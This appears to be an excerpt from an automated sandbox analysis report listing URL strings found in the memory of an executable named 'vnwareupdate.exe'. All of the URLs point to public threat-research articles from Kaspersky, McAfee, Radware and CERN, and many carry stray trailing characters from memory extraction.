Source: vnwareupdate.exe, 00000003.00000003.236580164.0000000005A51000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/77621/newish-mirai-spreader-poses-new-risks
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/blog/sas/77908/lazarus-under-the-hood/
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/denis-and-company/83671/
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/denis-and-company/83671/Denis
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/denis-and-company/83671/Lazarus
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/denis-and-company/83671/OSX/Coldroot
Source: vnwareupdate.exe, 00000003.00000003.241469453.0000000005A11000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/07/Kaspersky_Lab_crouching_yeti_appendixes_eng
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/08/KL_report_syrian_malware.pdf
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/08/KL_report_syrian_malware.pdfSyrian
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/08/KL_report_syrian_malware.pdfThe
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/08/KL_report_syrian_malware.pdfWannaCry
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regi
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regi8
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_RegiAPT1:
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_RegiMiniduke
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_RegiRegin
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng
Source: vnwareupdate.exe, 00000003.00000002.569366992.00000000040E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_engThe
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdfLinux
Source: vnwareupdate.exe, 00000003.00000002.557653688.0000000003E61000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdfTHE
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/gaza-cybergang-updated-2017-activity/82765/
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/gaza-cybergang-updated-2017-activity/82765/80
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/gaza-cybergang-updated-2017-activity/82765/A
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/gaza-cybergang-updated-2017-activity/82765/Gaza
Source: vnwareupdate.exe, 00000003.00000003.241875314.0000000005751000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/in-expetrpetyas-shadow-fakecry-ransomware-wave-hits-ukrai
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/introducing-whitebear/81638/
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237440903.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/introducing-whitebear/81638/Cat
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/introducing-whitebear/81638/Patchwork
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/luckymouse-ndisproxy-driver/87914/
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-m
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-mLarge
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/new-multi-platform-malwareadware-spreading-via-facebook-mNew
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/operation-applejeus/87553/
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/.
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729//
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/5F97C5EA28
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/APT
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/DCSO
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/Emissary
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ScarCruft
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/Turla
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/shadowpad-in-corporate-networks/81432/
Source: vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603-FreeMilk:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/836033Group
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/836033Skygofree:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/836035FreeMilk:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/836039FreeMilk:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603Diplomats
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603SSkygofree:
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603Skygofree:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603Spearphishing
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603aSkygofree:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603ll
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603nSkygofree:
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603uGroup
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603wSkygofree:
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-thre
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threThe
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/the-silence/83009/
Source: vnwareupdate.exe, 00000003.00000003.245855228.00000000039E7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/travle-aka-pylot-backdoor-hits-russian-speaking-targets/8
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/travle-aka-pylot-backdoor-hits-russian-speaking-targets/8n
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/MSIL/Agent.PYO
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/WAP-billing
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/es
Source: vnwareupdate.exe, 00000003.00000003.237491320.0000000003807000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/0Zero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/2Zero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/3Zero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/4Zero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/5Zero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/7Zero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/9Zero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/CZero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/PZero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/SZero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/d
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/gZero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/hZero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/per
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/sZero-day
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securelist.com/zero-day-vulnerability-in-telegram/83800/yZero-day
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-stea
Source: vnwareupdate.exe, 00000003.00000003.245614299.0000000003AA7000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-te
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-teDragonfly:
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-teFancyBear
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-teThreat
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-teeThreat
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw(Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw-Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw.Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw/Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw0Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw1Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw2Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw3Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw4Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw5Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw6Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw8North
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw9Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malw:Gold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwCGold
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwLGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwSGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwTGold
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwTick
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwVGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwaGold
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-pe
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwdGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malweGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwfGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwgt
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwh
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwnGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwoGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwon
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwpGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwrGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwsGold
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malwuGold
Source: vnwareupdate.exe, 00000003.00000003.237611046.00000000038E7000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-globa
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-globaCyberespionage
Source: vnwareupdate.exe, 00000003.00000002.528528109.00000000028B2000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/lazarus-resurfaces-targets-globaLazarus
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/leakerlocker-mobile-ransomware-a
Source: vnwareupdate.exe, 00000003.00000002.570785608.0000000004161000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/leakerlocker-mobile-ransomware-aLeakerLocker:
Source: vnwareupdate.exe, 00000003.00000003.245791168.00000000039A7000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeon
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeonps://goo.gl/CywXnS
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/north-korean-defectors-journalis
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/north-korean-defectors-journalis58cNorth
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/north-korean-defectors-journalisNorth
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/north-korean-defectors-journalisbGSowbug:
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/targeted-campaign-steals-credent
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/targeted-campaign-steals-credentDragonfly:
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/targeted-campaign-steals-credentIt
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/targeted-campaign-steals-credentMajikPOS
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://securingtomorrow.mcafee.com/mcafee-labs/targeted-campaign-steals-credentTargeted
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-repor
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-repor9Paggalangrypt.A
Source: vnwareupdate.exe, 00000003.00000003.233668995.0000000005DB3000.00000004.00000001.sdmp	String found in binary or memory: https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reporJenX
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://security.web.cern.ch/security/venom.shtml
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://security.web.cern.ch/security/venom.shtmlEvilBunny
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://security.web.cern.ch/security/venom.shtmlFurther
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://security.web.cern.ch/security/venom.shtmlVENOM
